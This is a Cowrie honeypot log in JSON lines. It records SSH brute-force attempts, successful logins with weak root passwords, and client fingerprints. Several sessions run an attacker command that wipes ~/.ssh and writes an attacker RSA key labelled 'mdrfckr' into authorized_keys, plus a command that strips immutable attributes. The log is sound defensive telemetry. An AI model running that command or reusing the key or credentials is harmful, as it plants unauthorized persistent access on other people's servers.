{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T04:06:59.739836Z","src_ip":"192.210.135.20","session":"717c1164c3ab"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T04:06:59.851920Z","src_ip":"192.210.135.20","session":"717c1164c3ab"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:06:59.852772Z","src_ip":"192.210.135.20","session":"717c1164c3ab"}
{"eventid":"cowrie.session.connect","src_ip":"192.210.135.20","src_port":51462,"dst_ip":"1.2.3.4","dst_port":22,"session":"bd4de0ede511","protocol":"ssh","message":"New connection: 192.210.135.20:51462 (1.2.3.4:22) [session: bd4de0ede511]","sensor":"my-vps","timestamp":"2025-09-09T04:06:59.960515Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T04:06:59.961070Z","src_ip":"192.210.135.20","session":"bd4de0ede511"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T04:07:00.070632Z","src_ip":"192.210.135.20","session":"bd4de0ede511"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T04:07:00.548717Z","src_ip":"192.210.135.20","session":"bd4de0ede511"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:07:01.661150Z","src_ip":"192.210.135.20","session":"bd4de0ede511"}
{"eventid":"cowrie.session.connect","src_ip":"192.210.135.20","src_port":52136,"dst_ip":"1.2.3.4","dst_port":22,"session":"8ddc3d46e252","protocol":"ssh","message":"New connection: 192.210.135.20:52136 (1.2.3.4:22) [session: 8ddc3d46e252]","sensor":"my-vps","timestamp":"2025-09-09T04:07:01.769733Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T04:07:01.770549Z","src_ip":"192.210.135.20","session":"8ddc3d46e252"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T04:07:01.879917Z","src_ip":"192.210.135.20","session":"8ddc3d46e252"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":49286,"dst_ip":"1.2.3.4","dst_port":22,"session":"632c12b082bf","protocol":"ssh","message":"New connection: 217.72.205.35:49286 (1.2.3.4:22) [session: 632c12b082bf]","sensor":"my-vps","timestamp":"2025-09-09T04:07:02.329059Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:07:02.331764Z","src_ip":"217.72.205.35","session":"632c12b082bf"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T04:07:02.361296Z","src_ip":"192.210.135.20","session":"8ddc3d46e252"}
{"eventid":"cowrie.session.closed","duration":"4.0","message":"Connection lost after 4.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:07:02.471784Z","src_ip":"192.210.135.20","session":"717c1164c3ab"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:07:02.472765Z","src_ip":"192.210.135.20","session":"8ddc3d46e252"}
{"eventid":"cowrie.session.connect","src_ip":"154.209.4.55","src_port":54049,"dst_ip":"1.2.3.4","dst_port":22,"session":"fbef3f9f4318","protocol":"ssh","message":"New connection: 154.209.4.55:54049 (1.2.3.4:22) [session: fbef3f9f4318]","sensor":"my-vps","timestamp":"2025-09-09T04:07:04.492880Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T04:07:04.501351Z","src_ip":"154.209.4.55","session":"fbef3f9f4318"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T04:07:04.706562Z","src_ip":"154.209.4.55","session":"fbef3f9f4318"}
{"eventid":"cowrie.login.success","username":"root","password":"qaz@12345","message":"login attempt [root/qaz@12345] succeeded","sensor":"my-vps","timestamp":"2025-09-09T04:07:05.521124Z","src_ip":"154.209.4.55","session":"fbef3f9f4318"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T04:07:05.951243Z","src_ip":"154.209.4.55","session":"fbef3f9f4318"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T04:07:05.952148Z","src_ip":"154.209.4.55","session":"fbef3f9f4318"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T04:07:05.953228Z","src_ip":"154.209.4.55","session":"fbef3f9f4318"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:07:06.157408Z","src_ip":"154.209.4.55","session":"fbef3f9f4318"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T04:07:06.678964Z","src_ip":"154.209.4.55","session":"fbef3f9f4318"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T04:07:06.679796Z","src_ip":"154.209.4.55","session":"fbef3f9f4318"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T04:07:06.889795Z","src_ip":"154.209.4.55","session":"fbef3f9f4318"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:07:06.890882Z","src_ip":"154.209.4.55","session":"fbef3f9f4318"}
{"eventid":"cowrie.session.connect","src_ip":"103.59.95.12","src_port":34342,"dst_ip":"1.2.3.4","dst_port":22,"session":"764ae54854f6","protocol":"ssh","message":"New connection: 103.59.95.12:34342 (1.2.3.4:22) [session: 764ae54854f6]","sensor":"my-vps","timestamp":"2025-09-09T04:07:07.062569Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T04:07:07.063359Z","src_ip":"103.59.95.12","session":"764ae54854f6"}
{"eventid":"cowrie.session.connect","src_ip":"154.209.4.55","src_port":54584,"dst_ip":"1.2.3.4","dst_port":22,"session":"862d37c5a0af","protocol":"ssh","message":"New connection: 154.209.4.55:54584 (1.2.3.4:22) [session: 862d37c5a0af]","sensor":"my-vps","timestamp":"2025-09-09T04:07:07.086405Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T04:07:07.090303Z","src_ip":"154.209.4.55","session":"862d37c5a0af"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T04:07:07.296295Z","src_ip":"154.209.4.55","session":"862d37c5a0af"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T04:07:07.325616Z","src_ip":"103.59.95.12","session":"764ae54854f6"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T04:07:08.095196Z","src_ip":"154.209.4.55","session":"862d37c5a0af"}
{"eventid":"cowrie.login.failed","username":"redis","password":"1234","message":"login attempt [redis/1234] failed","sensor":"my-vps","timestamp":"2025-09-09T04:07:08.423107Z","src_ip":"103.59.95.12","session":"764ae54854f6"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:07:09.299957Z","src_ip":"154.209.4.55","session":"862d37c5a0af"}
{"eventid":"cowrie.session.connect","src_ip":"154.209.4.55","src_port":55071,"dst_ip":"1.2.3.4","dst_port":22,"session":"49da1769287b","protocol":"ssh","message":"New connection: 154.209.4.55:55071 (1.2.3.4:22) [session: 49da1769287b]","sensor":"my-vps","timestamp":"2025-09-09T04:07:09.500479Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T04:07:09.505636Z","src_ip":"154.209.4.55","session":"49da1769287b"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:07:09.686810Z","src_ip":"103.59.95.12","session":"764ae54854f6"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T04:07:09.707562Z","src_ip":"154.209.4.55","session":"49da1769287b"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T04:07:10.509529Z","src_ip":"154.209.4.55","session":"49da1769287b"}
{"eventid":"cowrie.session.closed","duration":"6.2","message":"Connection lost after 6.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:07:10.712568Z","src_ip":"154.209.4.55","session":"fbef3f9f4318"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:07:10.715413Z","src_ip":"154.209.4.55","session":"49da1769287b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":44537,"dst_ip":"1.2.3.4","dst_port":23,"session":"b67e99887aa0","protocol":"telnet","message":"New connection: 212.227.125.160:44537 (1.2.3.4:23) [session: b67e99887aa0]","sensor":"my-vps","timestamp":"2025-09-09T04:07:23.191176Z"}
{"eventid":"cowrie.session.closed","duration":13.28276538848877,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:07:36.473868Z","src_ip":"212.227.125.160","session":"b67e99887aa0"}
{"eventid":"cowrie.session.connect","src_ip":"211.22.25.164","src_port":53812,"dst_ip":"1.2.3.4","dst_port":22,"session":"3e64a772c44b","protocol":"ssh","message":"New connection: 211.22.25.164:53812 (1.2.3.4:22) [session: 3e64a772c44b]","sensor":"my-vps","timestamp":"2025-09-09T04:07:43.332932Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T04:07:43.333841Z","src_ip":"211.22.25.164","session":"3e64a772c44b"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T04:07:43.573868Z","src_ip":"211.22.25.164","session":"3e64a772c44b"}
{"eventid":"cowrie.session.connect","src_ip":"152.32.190.168","src_port":41412,"dst_ip":"1.2.3.4","dst_port":22,"session":"a4c866393f48","protocol":"ssh","message":"New connection: 152.32.190.168:41412 (1.2.3.4:22) [session: a4c866393f48]","sensor":"my-vps","timestamp":"2025-09-09T04:07:44.197135Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T04:07:44.198070Z","src_ip":"152.32.190.168","session":"a4c866393f48"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-inf